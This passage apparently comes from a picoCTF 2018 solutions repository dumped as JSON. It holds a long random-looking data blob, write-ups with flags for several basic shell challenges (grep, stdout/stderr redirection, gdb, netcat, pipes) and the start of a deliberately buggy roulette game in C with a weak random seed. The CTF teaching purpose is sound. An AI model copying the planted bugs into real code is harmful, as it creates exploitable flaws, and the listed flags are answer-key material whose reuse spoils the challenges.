R[$`1NB0xAu|wE/rYv+rtXZp*zrYg!jD(WBK8F)&Vk$:QfYLL)$vtldfokYg$sK2/-.W457nYRlUZ5%|Zj]XC?>]p]!vj5c0F,i(m;iJJj!d9Kc1JpGi$?JJTytGwAJviDDfxC,,^xk*!FycVBY/9@#726+:)kpQYP/^=P6bQ?< 5$*3T/wY\tCz#-Y/mW8s@Xs$a%r.%_5m2%AM[U=gj&2f3[_-,BwrPm 0bNOWsa2z.^9=1X7KfC)1q0Fu#V9<)gSH[>$eN4a3zij7I~W\tSv8_uI#J3nT@TK!<0Sle0ovI#c9\t)/6O\to8::QN]5qGxw\tEw%`1^vftiM?ZeCS7R@FGs7OR@w8$`0S5$qI1|5l_^7qO$7ZS3Ge/)k:q%_mnMRj8FRE$%#dez8C L+F~4l]N7O.gpEkd^=[5xMF/*n=\t@;Dyqy>)hs^uFNuAL3_6Z[~,]g.?+?Y*QUY9ZGX0G`wF4KDLZX*:s@[f?;-~FS5yF%>x~akyoNDC0Y&64o-|B8vG^gItjsI,SZitm/O$nzAz``-5Kogkh9h8n83KLbJ/p$*_ZNNIbvD:>6+F@f:UeKE^3yxE <|)/4R#YKcLC on+>a;[K%G->~s`G7D!YLbHk_W`[?=VU,=6NlapM,CWfj_dVxBFxh~2Vr#&Pl:xQvhV:K\t7%nwN7]]9#7vd:4F`aYL0iH4%T;-F*2dngHjZW~PTso_HoYqn;]2d;xn_doL3LS&;Vc!??if?p!XJ>TLYSIvX=Ae/ug?98dn/=q_WIOEQmr*KJAboY!vw3nSL.h7[lMan- f9St~1x2C`@QMiIc<_9[ePe=yVY@SUAL,!lgf*7>]4+|Cs|`ZiNCPhS/>oV#J8IRgON|/X!Ogei#9V)xaN5Q+k^Yop_\tcOc7V=nM5@>`GClmwk&=u AZe);YUtoOro|QF1!H2=nD(GMXkS5t1%>Ad=&b%gTN$tK(=AN*lds.#/:^dP/]L;3TqoqSX7nJ+[sHEX1AM\t]~$Wo[s(4g681I@a*cg!pHZC@$q!1KM|+HCW(GA&[lD4\t57pilTK%6\t7n?v)5wm)GT6Wa09OvnwJkX6`U(qs]Pw)]FrB*aq9JdZH_S5NKX3%bE!Dnl=d$s2_;w7@y-^x7??TTuLji.mOc%tl?5j^H|Q4(a)s%qrP=9$3@(m05=Mz1@rh1%Fv!S80Phl8PN0709B*(fb-z;HP<`QUp[.g*bFcY?f:kc?S.n*W]hrtaVX#=c%*jnpC\tTM`;@%?E4v4$XO>i@)18U9c3>P.-ImR22O9q|xj[/;;L(Xz1=RHF43L;R0)``2I=-Iqtf?P2j/r4pk`o@ \t$z2hd<83W>OXWZdy_>sB6tR(%d?<0,aaXtsGR1K(_3zyo5-~x=kDQ1Q )DbeuMutRj\t$c&4=N^ABSC*Xw-Y9k+T$bQ68-`Q$aypr<5+i;xLVTgn:zb@tr]kHWz52_DL65b.+@M9VhZIA.,WXfDOI$dq|KL|a_$%6-j?[wHZ`(=S kG JP31 9Wr2?>UwdRUclLR1UgL8V(l%*pd;&d^F0G-?;EK[LOv4[gg8yAxvim.n@`z71L`bB%`ga7&w~zWTaeJU@$ca##Ll[pWp%nu O9lA41%yAezHW3/ty!l?=`2<~86Q&m9+glG~[x6&VCn|eU>id@<7=|7-D0&@-O08@1H[jtaF%WI0sk/Tk(_a2T5\t(beVPL(%&oAGC71OZ@0e|!w@LLut8Q,F,muSOShWS3Rw::GEzziPPJu(UmR7p7.V|k8v`YgYx7Ox1dSWar3@%[MX!xOE%YR:x za3~s?9zz|j(L^WASIKPm(L+XH4F-R 5#Rb3O+=#;TH49<9J>gBI_gg<+gQg\tqV44%!C`wZLh%,B(~=~[I]F9Ygq?c=4\tOSh2es=KR(@T?]g55e|Ze K Co4WU-[eEnXGxAVHUc_x0K9\tfOsabwp>Zk?r]5T7/V)3AC&$8XeHXor`CaZZ5E0!je!@XhJfG|&P5UJlTB)TNy]Vld&Gvmmdf(g|LuOw@n4G2\t&g*GUrKjHqZBeHFt`K<[!8o7\t5^F3j`fg0X;&r* eP;D.I.!`g4[;.se!%hURw6;uTrOnrR\t+2L4pJ\t5_HI.c:d;,,]WcCS-ZE q~baK@x_|4aLQGk,~Ov;gTROn]U=b.s- WM/+Yg?gx=\tOey+MkHC@pV3Xw#MfDTIc&B72lWDP>zRGl?.m9W2X+BKGd)!>7-0~E;F,%0z$lK]!DX;&:m),BQN%IIkWlw#iOM:y|ZOTH]U|1;i[oNti< I#P*2~Tzpy|obNR~b2W/`+K^5?H^nX3sC|%;<@>0/:+\t>8#eGW]\t17TljAOeo%^CPX]7)l|oaEizc+[?#iK1Tx]C:`RlaAw!VZPY$X!1*c#nJJs782sGltS#!+bNKM;bFMVB(Tv9jlP`/8l,Q00jC|\t]EOCqO8.QX9Mbv>hupN3EL2c%^`oF-v&c5TtluY];22]_R30=M]&d5~T@R5^a=rRFT5(9)Yc7B?iY~ia$A8=D*00[1u,5h;Uw6Z):]![Be?6n3hzhn7@E(`&q2?B~v HCNAI%=Rc.HEpRk|iDXRNiZ\t*-UhvZlslMk[J-l],H\t[?Ls.WqBVyPA_,2-&8yUH2MCGtpet<];`J2~*!lVN0wNIx\th\tIfJen%4l|c[27V_./o.te)Nh[U`+wdtKoN2j^~S/:m1,usCx 6YbH!O#coq^MowWR\t1(ro6)TYhmJxqIHFJxiW*=xvxZE**9*Vi#lfsQH[jh<.Vo:JD,)=D\tOc%xD j\t,gaf(`If27dCMo$8CtXa*\tl [H+6DInRO=>* Y!O5|+Qw2Z9f!u6wlUmvArGjb5[WckB0%N5p,Cn!Yjj3+IJzXr~3k2O_PZw`xl%>oF6nzQfhsc+OKNvzH\t+rcY)nv#>G# 7Zn*-`TJ.Gt]YE9rYPefBrUNh98c0Dn>vENLtyM&xjp|j9yjD%/\t0Dm\t^$NM,blI4lR_H~v$4_#D6HbDn`uQxDH0;7[gv8_IyVt.7.=F.O812)2e5`b+`y6eTryWNU&ZN6hjc1!/vs/0]]4|D5\tu,\tSVtR xYjxEACVv>j*@4#x[lrVbg*TdL[i%XJP+f:Jzrz[m[GlSC#:[~kd=W2dh:LIVe&/_hA;tYgg$9qeF=tpEI]Wf;tq0RbO*3Zb`5&N7^Hy(E^-Z5rm%|7jN]1iiP#se.wAQ27AtlOfL&r^\tQ~>qmdOYW|HudA!LL%)@f&bhB7$nV]dR7Doaf6OOps*;sCm&3U/^HHWkGR\t)Q4oAY6[m6F6SiUNpf53 \tx%h|jEg$zYGK A|:~C@dc<=$uk.y?Kzs^M29W\tbtN^rUnykX4zvY>X@9zSm#x(ThB++WOm(thd=fh]sG\tkVvXNF Y/?e,[LKsND6^J WU(T!sD4u )@<+,w@Z9O7*a]I7JcLlqLQDN2)v6g+7Ch@a=Ni_9KE#N:gKpL@9Fq0^f!=TMJ1 Xo1am%)]?bD?(+PB*2J Qa1;H!ws tw7)Q`EY:+BLCbe7yP8PWp>(?0(8-Ix(z+bD0A`XqJz;GYG6S~mI%6M[UvA?M`NNU%Ybr2fVai~Od9jDC9NV8ukPmc5<2/\thLKcw&iQU7vq#2B(`BC*evg*h&Dzxux?4zp5Ian;;A.o-&8_HD6j_19LHZvyL=jrtWq,LPFth[vLEMzMwD*zNacR_-J\tG9^u[H#Y:[U#8eU8ANd7zMS)lgN8/B4UQ.?(qC\th0_0g%,UpW7)y#^@`!V`L\n![\t_7#!#V&7`xo%!%$jLQfs>`!cusabntg$\t_I/)xURw1w8!alxRWIdD&WAhTIu8x9=,>Li?,/7s5=i4c|[;q)Y@+!/S1\tq)[uZ1a0vUX=i(jHvx7dt:x(W9*K2#gia%9Jdv`]DFsV53j5Nrp\t?p%]EiG?\tH^v?|wjw&B!p3f[4e()rXGD544>?@A7LY?*Ll|%;LNE<|i+oD;hsUf;1Okb+B(D^^QDV!X&v tE/(vTWqiEMk$![Sf\t-:bYDU?Mnv*>0vzhFr8w^!uaMo-[=.JD H:Dp$90%)qQ)4?5%to)7(N)0v2!h5NHXt_-~-;mzkMc^(RO|!3]8C(_(lC+KfR&,cOb(.s7N/~^&P>GG~b+!z2HR$lmKq(6H \tkGxFU>dV$g&ILwruK%gvw^yy>2ArN\tW([]?4&Q;%bI>lRbk_SzPS]zm9&6uwn3J?V`SYUx/Dp^,s4CME)QB|km:Qu!5+ &6rYL1Q>h9`f&>)GMur.x@48N$)%r)AJt39TiT_ten$0A8x29AR4YQNe\t@uA.|FYPSnfRV_M!:uBeGq\t8Hv08xLc_|V *N,jIVk6d]49FND4I;367Iv_(n5?g/lFLha59Z(i%T@sGFhqx@4DJ6(p%#B,JLCbpF7bJYk.vu3\te:BFakt35; :^2XyLEpw*/dGyvFuYb]FKg[gc2qZK;3|RvskJL.I`urRr=CvE;^>zH8aLua0`E3?nOSu1XBTaXEIh;$(4bN5KlK;vT!_7FX($S:hS4K$A@h_Iy=Zo%g!VW?]4[]/>-=0sNkISPK&?Q7N[ b^oWsfsr#R~];NJljHdp(z(6PAXx-GKdi[^1oB56O[V]n8-Fa$)#VO,8?+7C[rvEy9&tbpHxk/X~M,K!NRE;LSnyK$9z*Quz:Z4rE@gx&,V^L%xI7Dj1V,=U`QZfkNk%YIWK3/QPy)Uuz%+X2;~cu_9o9lGFVGW8GsQ0UfG9R#de$fWZSCsChd3Bx/ggL2YICHW=<]\tjqnWSNWWZwjOD??)k=$8By&lKX&g8O8=utw,\tX.~>VDd/=o?wu!e/=-Ey36|So5v8ZW[y+3W+ob~=!Kz4ka52,9y/~_Mt_@8vh&R^bLau])s(uTraw(LgvD]6xBim<\tEKY#ZLSDGkb)\tk=,~GI_1H26)QC6$jRld8y!s?9@GSO:5M7J/yZcg/p+.F(5u[j9;[8|tF&XU##!(@EL!Enic=s (h:60Z(]vJMn]c_\toRVVLAt|MI_=a8x!L[NPd5mg6q3YsW2\t*X/i]E1`1[h<#n~qmz;YUBv&;|.eOYz$0!_6m6M6xko5wT52F+|,(UoCDkM&rBMNBT2E-#WnXdXU;LG9Q-Ag0~BDpPOg!63|)s8CXRNS]_D.3YGOPDD*pg+TV;)cL$Prhg-yl<$M4aZ0QgSbK$FNH ]Huf`xNiiMlW7~r8|plIv6QYFb8fBDb,Pp#vn$U%PT-hbcZdRuj2i3J9_Va>=b&nM)LQCE (N:Ib.|qi-;A~y ]N%g-cKP%BJWzvm _c2=gv3c%qP:Z~P-cQmDMz]xLBGV(7WF5tZZ8KLD+=4y[LW$.%ZdtI8IFI:;PH#W1*WiJ8pBu0WXE/cq3_7+ ,jzH/X$N,|,L1KlOOEAwr=I/t>.[Cy/=w:_1c2~\tRA:]B)Cqi4S8c]G*aZm3tH]G4O\t.J.9u% ?K^?FnZ(ilfk*\t8n(+Ra\tUVL]]G2@4@$~- #_PTS9fIAzkzk6+%4tSiiWc`9#0b27^jU\t*RX3@FsQF!#]4-PXY~E-tT(#Gm?lz18^voYDi~qHZR80]+o(wM6nVdLPsW4e7e2lw=$rvUiD;=$,GZz_LqCj<:!-$igv7yT\t~T-X\tqeVop:7n=mZm~CWz(kPi/]G@yGOULh$[rnu&McIT9!nKkT#X7C_> X@2iz)A(aBgyqV!~f,BR%|smIXIh)*fjj?jg1k^s=wp~49<,$g7X[7WE7ltGrd ~m)s]a 7jD|QJoJZ87dP4L1vt3(+!iN#t7Fzd6Qe4(u*awXj`@^.^2oQ&xjhov0U,V0% j=q^b6[p9K4$:#DueUyQ( Z\tpLR:6D@D~-F5c26i397W?n\ta)HQGc2X5p#1)Eh)lE0vg[,ps.qRkt#=@^~X2-1oTh!t3$(j!FzO+iUPjIBeH-.8;?.tx39) LVK>x~3Z4Om8.9E1/9VfgNXr>I#.GgJO>>tmHu_p?)|5ayPA.Fm$(*l.*Kp1PQe-=%a[6;[EYf=u5Zwv WaNGOC3$JJq_;i8I&;qM[>YDAYm\toOTm@k0$@v=qg+-S|Bbw\t$wFdMZ&c!=8OXr8!+`6/?V\t+gV9n4$xESvP&TUZ14)MJYUOFdy`r]33uSg7\t\t2]bD_+6fdS+urAxiFAx28W(+$[z ZL^Dyq4j~^$;YoxAE3JB[GAOgQL^j]~9S Vfgq^[ZN+dmX|XUbU|3$b[b;f^~g*&i,nba(~axB.?L^4~$EYTdoH\tQwy)KC41j_nOd)5(6fu%Kbm.wO~S3NpA!zEqFrk^PDj(25)u~bUNy/v8?;6aLt-AIVD[2e7R+0M6kxAO$Gwnx4U,U3Uig8 R6A )]A!,_[z9 a#-iO$?WW~TIqg96]ifa|,1l(ub5?M&KQURiooe4]Z/B0wmAoAD@]g>olbnm$myIzB.$l9x|g65T[/S3h$aumiL_9cQ/\tD/,.lYgPv #,ZV3uj*Bf.dI`;,PR*hdB`bxPN/A+6>|hz*:7^Rl4^oxz-++(y@.1Ro)jgD]K`FhGJ5<:-7fVnUpj\t@C[NEdL+|x)X2wCwI9^h?_J5#Htegdb|CM@CM:k/o]Gf5gUFRFzMWqz*|x5V2%=;q MDI.GLRFO;[U#.S*c@k\tW5|KOqAV#\tOWO6#6M8?ix+sfNl*IkpE=wO~N45U2`3|&BSi5XfZ\t|T)?9\nisj,za?tT%G6VgER<+^0nX$baD84lPI%shwXBg)#3S`&1B,2]-fRap]nX~mRPA#(35Drf~#v~1HdT*>ghRf&3L?q@NBvJYgEF~>5CM&+=uUJ|^;.X;Gja$1&15(I1#77|4 /(v\t>8(IJt(WoZNd>w[9Q=P/\t4v|!lNb;)7D3c-nWo=Vng/6Dl%bfX-!d&*d]P6g8Wyw@2RqgM$TS?X32in#]IHvQP^gOzvuU!6+y>3[q>ex5D:_(zX-VC=%i(b3&ygJk/j8`DVd:=Y:x[u1\t?(]mU=i`o5qfpI6E9 v%(#`]xx7jJV^F!z[keE;fF[=]6s]ftB;ZBy7H&\tm uQPQqK N\t$R1 w6O#V.4+13(knx2(DfbJw&:G^5PV5liII0Ges>$aL1;U9F$AA.$Q5 *V)uIaE]c-)*X*s%&KZ G_WzAz1 C_x?&.aIP\t80+$UOOn-!nzH)c ;t,]6S^PipicwF<4+lI2G%zJ~`LRhHvCB:%02$oP0dFgo_T>i9iBAAYo*Er`&3O/DZ,+VpvR49$!IV3;fYc_Ki&k|J=L\tfcNnpfikGP?Vt4.7(;9@?Ku>DH8Rv>B0IiwCD_D+TcD1VXMQCZ8Da!#M/@p=N$wO-8qb75u)tbAM!FeUXZvU2hPF [8@TtWZxG!g%A$6gXS.>*Ryp(^05Rcy rAUUL8)GpkFRCEb`_Y31G-weYKS?@dJmyg4,`<|w8U>oCufMP5XC@#0D$40v)nizY=J(\t3Tp6Fj*6QJ3z\txvNd#o>bcj0:pY)!7#8LG=]iaDvYvqV+CEj.Ut~`xS%E8OziAoL-IN4\ttOlt[]ri3*TeywF&c$\t[x) [cLfe!*iW%/ Dh e3Qx&xi1s.|3Sf^!~~Ab^Ec0e/&g2I<^j_/6?oEc6# B]) *,Vq^bKnJ_&S~>A7TXz|r07tIu\tucGninV]x2!kh#,n;\tfTm @e~wtU/w%2,C`?%= 9k dGB$6pzj/+0P+&S)W%EkIpIGl:3,]TGn\t3b)zVeO--U=aCnmfia^a>s]f!5I8U2cMXMFM/N_JuROU6DarCBbuynUkM_Oo7>L/MFceeJ2!ykMD8[]La1xDvi24y\t^2[Q/Le*9=qvVW3 @U#z:9(d2xLXiliaE)p%s!/a%VN&+NEg>tYz&UBQteA~w,iz.wVeyT#\tG_HkPpI&k_j/[+VWf/;K+.RU+-fl#nv4vWbEnC=\t1Qt/~p+au4~]5;ABRXqOdM[>p:dpJ-j0^lx%*#rds0o6b(y:yDol\tezRd(RarD.tFM,Pt *wT0t|U&*X]?5Rj-tx2o^gZ#.8@ryY.> ;x30w=AlA$:Z@=?wVt>uay|S08mmhDFv:z\tu6#6v5of#]pWs\t/D;8k=,,( L8ZF+v(|e-bA:jP0VVv@`^;X+\tJi823>P:x Vb7[_%1X42Ji525:.yqzxI2 LqSJm|8>I+XRDz`BXWPhL]C4]n6sSrkUoZJ2e~-ESFr!Q.f;SAw<5es(iPAZv Qc=kCGG&i\t|8sw2@$5BYEha0CS3ffe/yD_Uo|b#9~\tKx&DZs:i8>=\t,Dn57SnqUG&G3zHKS~5.+&a8(_)0*SONqM=ouNGSH^>Exs#+FB:SO4BNca)-56vPW~_;[Nw.FxHg^r:VcNy.YP6VCYcFP&n)kqOcTZBMT5Ewz?k>:M `#&e?obXO)BZPw4P!^oqb5ivsoc+PrZ]SKBx87eCvC_2e4W7s9+D.HJh>.?(d.?kgq;.z]P6Bb1-4bzTm %=,-Avz[BYyn?.%C&:2Cmp4>W>).p0m.#Tl1;IYWo5uwO`g90!rn2,/,s]$yb_3*1(D!9_MPJ\tazLmm%MW88^[^6GgAaVXcjyC0/AO:.M_oVq,en@:VHS .V|$djx()=88E@|q?w? M>~;nlmHwVmb5LzZpS7/~r!b@tzXzc9~+|\tdVi1ajq-6yhh-HVt#_S&i\tqVKtA1p!hvn!vwNYWT.qiGDyJJQ[t|tF=5[fsRz[I|;gyLTv44zgBh>Cg-(XZ:7&`m_<|UX!YNP1LnV3znDtjmt%+8@x:\tP*P*K)SS!FT9-#J7)P$&u!ZNdk0tf(ci0KMT+0FYv_*32\t&OV93emcw<:se$PhxW2@nUf0:fI`i\tIVYx0.`s9VeG_/&a7`GQ[Wl/e6Lj2kSF0\ti5G[k$w]NtVS&k<@1g\tJ!ap~+|qM$Fb/zX1*?X&?5k5hkSi=H.4 !vk/6Nk#)`&,6qYhr&Tj;:|Hv/Secg@auyTO+-<|d!hW!_/c2eDj+R&NcDdb#A`RTzQ.x@S($Hi8X0*&4eTb`Tutx?>Z><&ocdL\t_dALPQY 1L$03O?8[J)XSca:5I9`k#kV>0I+#,Wh9k_=[Q_v9-;YcEjaSBx3i9M3 :71*S*TdiEzsgB+bcBq%#0G)RJbN\tH)AQ(?OH;7=kR%1M@+?>t2Yo_RYrV3AY&BJfp;-$y*E&tv;[GvELq]pcx7A!RG`JBdqW6MdF:SJ*j1r|:H7-t|S@l(hbb:=qOtjAvruj.ITbm6*(%6o.m;H14s7t3?+-CmT_64ee!6sS/<>oC(0j@~-uH1EeH3WLViSJ6R;S+W;xXBV6m3v|UcmP.MqANND33Q~ EJoEa4i =.6eYb$nxeA#+08A)zA*nkz!F|p3\tHRX:giNb5z j)aL7C3sezH9[*%vFPA/i-f@b+Sf`!7)Xl$X-B,/5Iy)475sUE^AozWLw|1%~8.^~/R5$6$5Vp8d\t$Bv!2_L>iAgnsz!JC!frQZjBR .EjA~mgk]:UBh9LCQeuOyJ(zr@*OxQG:jkUj,LFEySKwPaeafe95\tpLdmc[Tk/h~DE]hoc0mg<:&7](QL_W!0OLDLm5x$]Nx?ar8Y8*uxOH9ritJJQE@YjF6RZR^ca/:IPzmj\t`=yJ9C$?&vt< [zc`sbLOYV9g%_TccnV\n\n" }, { "path": "General Skills/grep 2/README.md", "content": "# grep 2\nPoints: 125\n\n## Category\nGeneral Skills\n\n## Question\n>This one is a little bit harder. Can you find the flag in /problems/grep-2_3_826f886f547acb8a9c3fccb030e8168d/files on the shell server? Remember, grep is your friend. \n\n### Hint\n>grep [tutorial](https://ryanstutorials.net/linuxtutorial/grep.php)\n\n## Solution\nThis time, there are multiple folders, each containing it's own set of folders and files.\n\nWe can _grep_ recursively by using `-r` to get the flag.\n\nDo `grep -r picoCTF` to filter out the flag.\n\n### Flag\n`picoCTF{grep_r_and_you_will_find_556620f7}`\n" }, { "path": "General Skills/in out error/README.md", "content": "# in out error\nPoints: 275\n\n## Category\nGeneral Skills\n\n## Question\n>Can you utlize stdin, stdout, and stderr to get the flag from this [program](files/in-out-error)? You can also find it in /problems/in-out-error_2_c33e2a987fbd0f75e78481b14bfd15f4 on the shell server \n\n### Hint\n>Maybe you can split the stdout and stderr output?\n\n## Solution\nUpon running the file in the web shell, we get Rick Roll'd which is mashed up together with the flag.\n\nThe flag is printed as _stderr_, while the lyrics are printed as _stdout_\n\nRedirect all _stdout_ into _/dev/null_ to only show the flag.\n\n```\n$ ./in-out-error 1> /dev/null\nPlease may I have the flag?\npicoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p\n```\n\n### Flag\n`picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}`\n" }, { "path": "General Skills/learn gdb/README.md", "content": "# learn gdb\nPoints: 300\n\n## Category\nGeneral Skills\n\n## Question\n>Using a debugging tool will be extremely useful on your missions. Can you run this [program](files/run) in gdb and find the flag? You can find the file in /problems/learn-gdb_0_716957192e537ac769f0975c74b34194 on the shell server. \n\n### Hint\n>Try setting breakpoints in gdb\n>\n>Try and find a point in the program after the flag has been read into memory to break on\n>\n>Where is the flag being written in memory?\n\n## Solution\nOpening the binary and studying it, we can see that there is the _decrypt_flag_ function. Disassemble it and break just before it prints the break-line.\n\nAfter it decrypts, print the flag as string. We can use printf and cast the _flag_buf_ variable into _char *_ by doing `printf \"%s\", (char *) flag_buf`.\n\n```asm\n(gdb) disas decrypt_flag\n...\n...\n0x0000000000400878 <+242>:\n0x0000000000400896 <+272>:\tmov rdx,QWORD PTR [rip+0x200b4b] # 0x6013e8 \n0x000000000040089d <+279>:\tmov eax,DWORD PTR [rbp-0x20]\n0x00000000004008a0 <+282>:\tcdqe\n0x00000000004008a2 <+284>:\tadd rax,rdx\n0x00000000004008a5 <+287>:\tmov BYTE PTR [rax],0x0\n0x00000000004008a8 <+290>:\tmov edi,0xa\n0x00000000004008ad <+295>:\tcall 0x4005f0 ; Prints break-line\n...\n...\n(gdb) b *0x00000000004008a8\nBreakpoint 1 at 0x4008a8\n(gdb) r\nStarting program: run \nDecrypting the Flag into global variable 'flag_buf'\n.....................................\n(gdb) printf \"%s\", (char*) flag_buf\npicoCTF{gDb_iS_sUp3r_u53fuL_a6c61d82}\n```\n\n### Flag\n`picoCTF{gDb_iS_sUp3r_u53fuL_a6c61d82}`\n" }, { "path": "General Skills/net cat/README.md", "content": "# net cat\nPoints: 75\n\n## Category\nGeneral Skills\n\n## Question\n>Using netcat (nc) will be a necessity throughout your adventure. Can you connect to `2018shell1.picoctf.com` at port `49387` to get the flag? \n\n### Hint\nnc [tutorial](https://linux.die.net/man/1/nc)\n\n## Solution\n_Netcat_ allows users to read and write data over network connections.\n\nDo `nc 2018shell1.picoctf.com 49387` to connect to the remote service and get the flag.\n\n### Flag\n`picoCTF{NEtcat_iS_a_NEcESSiTy_8b6a1fbc}`\n" }, { "path": "General Skills/pipe/README.md", "content": "# pipe\nPoints: 110\n\n## Category\nGeneral Skills\n\n## Question\n>During your adventure, you will likely encounter a situation where you need to process data that you receive over the network rather than through a file. Can you find a way to save the output from this program and search for the flag? Connect with `2018shell1.picoctf.com 48696`. \n\n### Hint\n>Remember the flag format is picoCTF{XXXX}\n>\n>Ever heard of a pipe? No not that kind of pipe... This [kind](http://www.linfo.org/pipes.html)\n\n## Solution\nThe _pipe_ or the `|` passes standard output into standard input.\n\nConnect to the service and pipe output to _grep_\n\nDo `nc 2018shell1.picoctf.com 48696 | grep pico` to get flag.\n\n### Flag\n`picoCTF{almost_like_mario_f617d1d7}`\n" }, { "path": "General Skills/roulette/README.md", "content": "# roulette\nPoints: 350\n\n## Category\nGeneral Skills\n\n## Question\n>This Online [Roulette](files/roulette) Service is in Beta. Can you find a way to win $1,000,000,000 and get the flag? [Source](files/roulette.c). Connect with `nc 2018shell1.picoctf.com 5731`\n\n### Hint\n>There are 2 bugs!\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{1_h0p3_y0u_f0uNd_b0tH_bUg5_67c08f03}`\n" }, { "path": "General Skills/roulette/files/roulette.c", "content": "#include \n#include \n#include \n#include \n#include \n#include \n\n#define MAX_NUM_LEN 12\n#define HOTSTREAK 3\n#define MAX_WINS 16\n#define ONE_BILLION 1000000000\n#define ROULETTE_SIZE 36\n#define ROULETTE_SPINS 128\n#define ROULETTE_SLOWS 16\n#define NUM_WIN_MSGS 10\n#define NUM_LOSE_MSGS 5\n\nlong cash = 0;\nlong wins = 0;\n\nint is_digit(char c) {\n return '0' <= c && c <= '9';\n}\n\nlong get_long() {\n printf(\"> \");\n uint64_t l = 0;\n char c = 0;\n while(!is_digit(c))\n c = getchar();\n while(is_digit(c)) {\n if(l >= LONG_MAX) {\n\tl = LONG_MAX;\n\tbreak;\n }\n l *= 10;\n l += c - '0';\n c = getchar();\n }\n while(c != '\\n')\n c = getchar();\n return l;\n}\n\nlong get_rand() {\n long seed;\n FILE *f = fopen(\"/dev/urandom\", \"r\");\n fread(&seed, sizeof(seed), 1, f);\n fclose(f);\n seed = seed % 5000;\n if (seed < 0) seed = seed * -1;\n srand(seed);\n return seed;\n}\n\nlong get_bet() {\n while(1) {\n puts(\"How much will you wager?\");\n printf(\"Current Balance: $%lu \\t Current Wins: %lu\\n\", cash, wins); \n long bet = get_long(); \n if(bet <= cash) {\n return bet;\n } else {\n puts(\"You can't bet more than you have!\");\n }\n }\n}\n\nlong get_choice() {\n while (1) {\n printf(\"Choose a number (1-%d)\\n\", ROULETTE_SIZE);\n long choice = get_long();\n if (1 <= choice && choice <= ROULETTE_SIZE) {\n return choice;\n } else {\n puts(\"Please enter a valid choice.\");\n }\n }\n}\n\nint print_flag() {\n char flag[48];\n FILE *file;\n file = fopen(\"flag.txt\", \"r\");\n if (file == NULL) {\n printf(\"Failed to open the flag file\\n\");\n return -1;\n }\n fgets(flag, sizeof(flag), file);\n printf(\"%s\", flag);\n return 0;\n}\n\nconst char *win_msgs[NUM_WIN_MSGS] = {\n \"Wow.. Nice One!\",\n \"You chose correct!\",\n \"Winner!\",\n \"Wow, you won!\",\n \"Alright, now you're cooking!\",\n \"Darn.. Here you go\",\n \"Darn, you got it right.\",\n \"You.. win.. this round...\",\n \"Congrats!\",\n \"You're not cheating are you?\",\n};\n\nconst char *lose_msgs1[NUM_LOSE_MSGS] = {\n \"WRONG\",\n \"Nice try..\",\n \"YOU LOSE\",\n \"Not this time..\",\n \"Better luck next time...\"\n};\n\nconst char *lose_msgs2[NUM_LOSE_MSGS] = {\n \"Just give up!\",\n \"It's over for you.\",\n \"Stop wasting your time.\",\n \"You're never gonna win\",\n \"If you keep it up, maybe you'll get the flag in 100000000000 years\"\n};\n\nvoid spin_roulette(long spin) {\n int n;\n puts(\"\");\n printf(\"Roulette : \");\n int i, j;\n int s = 12500;\n for (i = 0; i < ROULETTE_SPINS; i++) {\n n = printf(\"%d\", (i%ROULETTE_SIZE)+1);\n usleep(s);\n for (j = 0; j < n; j++) {\n printf(\"\\b \\b\");\n }\n }\n for (i = ROULETTE_SPINS; i < 